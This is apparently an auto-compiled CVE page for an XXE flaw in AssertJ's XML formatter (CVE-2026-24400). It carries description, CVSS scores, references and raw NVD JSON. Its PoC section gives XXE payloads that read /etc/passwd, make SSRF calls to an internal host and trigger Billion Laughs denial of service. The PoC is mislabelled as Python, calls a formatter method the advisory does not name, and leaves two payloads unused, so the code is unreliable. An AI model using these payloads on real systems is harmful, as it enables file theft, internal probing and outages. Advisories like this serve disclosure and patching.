CVE-2026-24400

Description

AssertJ provides Fluent testing assertions for Java and the Java Virtual Machine (JVM). Starting in version 1.4.0 and prior to version 3.27.7, an XML External Entity (XXE) vulnerability exists in `org.assertj.core.util.xml.XmlStringPrettyFormatter`: the `toXmlDocument(String)` method initializes `DocumentBuilderFactory` with default settings, without disabling DTDs or external entities. This formatter is used by the `isXmlEqualTo(CharSequence)` assertion for `CharSequence` values. An application is vulnerable only when it uses untrusted XML input with either `isXmlEqualTo(CharSequence)` from `org.assertj.core.api.AbstractCharSequenceAssert` or `xmlPrettyFormat(String)` from `org.assertj.core.util.xml.XmlStringPrettyFormatter`. If untrusted XML input is processed by tone of these methods, an attacker couldnread arbitrary local files via `file://` URIs (e.g., `/etc/passwd`, application configuration files); perform Server-Side Request Forgery (SSRF) via HTTP/HTTPS URIs, and/or cause Denial of Service via "Billion Laughs" entity expansion attacks. `isXmlEqualTo(CharSequence)` has been deprecated in favor of XMLUnit in version 3.18.0 and will be removed in version 4.0. Users of affected versions should, in order of preference: replace `isXmlEqualTo(CharSequence)` with XMLUnit, upgrade to version 3.27.7, or avoid using `isXmlEqualTo(CharSequence)` or `XmlStringPrettyFormatter` with untrusted input. `XmlStringPrettyFormatter` has historically been considered a utility for `isXmlEqualTo(CharSequence)` rather than a feature for AssertJ users, so it is deprecated in version 3.27.7 and removed in version 4.0, with no replacement.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:assertj:assertj:*:*:*:*:*:*:*:* - VULNERABLE

AssertJ >= 1.4.0 且 < 3.27.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import org.assertj.core.api.Assertions;
import org.assertj.core.util.xml.XmlStringPrettyFormatter;

public class XXE_PoC {
    public static void main(String[] args) {
        // PoC 1: Read local file via XXE
        String maliciousXml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
            "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>" +
            "<root><data>&xxe;</data></root>";
        
        XmlStringPrettyFormatter formatter = new XmlStringPrettyFormatter();
        try {
            String result = formatter.format(maliciousXml);
            System.out.println("PoC 1 - File content:\n" + result);
        } catch (Exception e) {
            e.printStackTrace();
        }

        // PoC 2: SSRF attack via XXE
        String ssrfXml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
            "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://internal.corp.com/admin API\">]>" +
            "<root><data>&xxe;</data></root>";
        
        // PoC 3: Billion Laughs (DoS)
        String dosXml = "<?xml version=\"1.0\"?>" +
            "<!DOCTYPE lolz [<!ENTITY lol \"lol\">" +
            "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">" +
            "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">]>" +
            "<root><lolz>&lol3;</lolz></root>";
        
        // Using isXmlEqualTo assertion (deprecated)
        // Assertions.assertThat("<root>test</root>").isXmlEqualTo(maliciousXml);
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24400
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24400
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24400/
[4] VulDB https://vuldb.com/cve/CVE-2026-24400
[5] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[6] https://github.com/assertj/assertj/commit/85ca7eb6609bb179c043b85ae7d290523b1ba79a
[7] https://github.com/assertj/assertj/releases/tag/assertj-build-3.27.7
[8] https://github.com/assertj/assertj/security/advisories/GHSA-rqfh-9r24-8c9r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24400", "sourceIdentifier": "[email protected]", "published": "2026-01-26T23:16:08.803", "lastModified": "2026-03-09T14:15:14.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AssertJ provides Fluent testing assertions for Java and the Java Virtual Machine (JVM). Starting in version 1.4.0 and prior to version 3.27.7, an XML External Entity (XXE) vulnerability exists in `org.assertj.core.util.xml.XmlStringPrettyFormatter`: the `toXmlDocument(String)` method initializes `DocumentBuilderFactory` with default settings, without disabling DTDs or external entities. This formatter is used by the `isXmlEqualTo(CharSequence)` assertion for `CharSequence` values. An application is vulnerable only when it uses untrusted XML input with either `isXmlEqualTo(CharSequence)` from `org.assertj.core.api.AbstractCharSequenceAssert` or `xmlPrettyFormat(String)` from `org.assertj.core.util.xml.XmlStringPrettyFormatter`. If untrusted XML input is processed by tone of these methods, an attacker couldnread arbitrary local files via `file://` URIs (e.g., `/etc/passwd`, application configuration files); perform Server-Side Request Forgery (SSRF) via HTTP/HTTPS URIs, and/or cause Denial of Service via \"Billion Laughs\" entity expansion attacks. `isXmlEqualTo(CharSequence)` has been deprecated in favor of XMLUnit in version 3.18.0 and will be removed in version 4.0. Users of affected versions should, in order of preference: replace `isXmlEqualTo(CharSequence)` with XMLUnit, upgrade to version 3.27.7, or avoid using `isXmlEqualTo(CharSequence)` or `XmlStringPrettyFormatter` with untrusted input. `XmlStringPrettyFormatter` has historically been considered a utility for `isXmlEqualTo(CharSequence)` rather than a feature for AssertJ users, so it is deprecated in version 3.27.7 and removed in version 4.0, with no replacement."}, {"lang": "es", "value": "AssertJ proporciona aserciones de prueba fluidas para Java y la Máquina Virtual de Java (JVM). A partir de la versión 1.4.0 y antes de la versión 3.27.7, existe una vulnerabilidad de Entidad Externa XML (XXE) en `org.assertj.core.util.xml.XmlStringPrettyFormatter`: el método `toXmlDocument(String)` inicializa `DocumentBuilderFactory` con configuraciones predeterminadas, sin deshabilitar DTDs o entidades externas. Este formateador es utilizado por la aserción `isXmlEqualTo(CharSequence)` para valores `CharSequence`. Una aplicación es vulnerable solo cuando utiliza entrada XML no confiable con `isXmlEqualTo(CharSequence)` de `org.assertj.core.api.AbstractCharSequenceAssert` o `xmlPrettyFormat(String)` de `org.assertj.core.util.xml.XmlStringPrettyFormatter`. Si la entrada XML no confiable es procesada por uno de estos métodos, un atacante podría leer archivos locales arbitrarios a través de URIs `file://` (por ejemplo, `/etc /passwd`, archivos de configuración de la aplicación); realizar Falsificación de Petición del Lado del Servidor (SSRF) a través de URIs HTTP/HTTPS, y/o causar Denegación de Servicio a través de ataques de expansión de entidad \"Billion Laughs\". `isXmlEqualTo(CharSequence)` ha sido desaprobado a favor de XMLUnit en la versión 3.18.0 y será eliminado en la versión 4.0. Los usuarios de las versiones afectadas deberían, en orden de preferencia: reemplazar `isXmlEqualTo(CharSequence)` con XMLUnit, actualizar a la versión 3.27.7, o evitar usar `isXmlEqualTo(CharSequence)` o `XmlStringPrettyFormatter` con entrada no confiable. `XmlStringPrettyFormatter` históricamente ha sido considerado una utilidad para `isXmlEqualTo(CharSequence)` en lugar de una característica para los usuarios de AssertJ, por lo que es desaprobado en la versión 3.27.7 y eliminado en la versión 4.0, sin reemplazo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:L/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubCon ... (truncated)